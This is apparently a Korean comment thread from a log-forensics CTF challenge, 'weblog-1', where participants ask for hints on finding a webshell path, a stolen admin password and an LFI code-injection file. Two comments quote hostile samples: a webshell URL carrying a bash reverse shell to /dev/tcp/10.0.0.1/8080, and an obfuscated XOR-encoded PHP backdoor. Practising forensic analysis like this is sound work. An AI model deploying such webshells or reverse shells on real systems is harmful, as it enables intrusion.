weblog-1

전체 경로 라는게 /uploads/sh.php?cc=bash%20-i%20%3E%26%20/dev/tcp/10.0.0.1/8080%200%3E%261 이런 url 이 있을떄 '/uploads/sh.php' 이것만 말하는건가요?

탈취된 admin암호를 log에서 얻는것이 옳은가요?

LFI 통한 PHP 코드 삽입 공격에 사용된 php 파일 입력하라는 걸로 이해했는데... 아무리봐도 LFI 취약점 있는 파일은 한개밖에 안보이는데... 제가 놓친게 있는건지요 ㅠ 해결되었습니다...

로그에서 탈취된 암호를 얻는 거 같은데.. 아무리 찾아봐도 모르겠습니다. 힌트라도 주실 수 있나요?ㅠㅠ

http 응답코드 구분해서 확인, uploads경로 필터 후 확인 등 여러가지로 접근했는데.. 며칠째 해결이 안되네요.. 무엇을 중점적으로 보는게 나은지 약간의 힌트라도 부탁드립니다 ㅠㅠ

존재하지 않는 경로면 404에러를 뿜는다는점 이용해서 404인건 다 거르고 계속 찾는데 안나오네요... <?php function m($l,$T=0){$K=date('Y-m-d');$=strlen($l);$_=strlen($K);for($i=0;$i<$;$i++){for($j=0;$j<$_; $j++){if($T){$l[$i]=$K[$j]^$l[$i];}else{$l[$i]=$l[$i]^$K[$j];}}}return $l;} m('bmha[tqp[gkjpajpw')(m('+rev+sss+lpih+qthkew+miecawtlt'),m('8;tlt$laeav,&LPPT+55$040$Jkp$Bkqj`&-?w}wpai, [CAP_&g&Y-?')); ?> 지금 가장 의심가는게 이러한 php코드를 memo로 보내는건데 이게 웹셸 경로랑 무슨 상관있는지도 모르겠고... 못찾겠네요...후... 조그마한 힌트라도 주시면 감사하겠습니다.

payload값을 어디서 찾아야할지 모르겠어요 ㅠㅠ 힌트좀 주실 수 있을까요

access.log 안에 있는거 맞나요?ㅜ

생성된 웹쉘의 경로란 /uploads/를 의미하나요? 아니면 다른 경로가 또 있나요? 어느 웹쉘을 가리키는 뜻인지 모르겠어요. 힌트 좀 주시겠어요?

파일의 전체 경로를 입력해주세요 어떤 경로를 말하는 건가요? file system 절대 경로라고 생각했는데... ㅁㄴㅇㄹ 게싱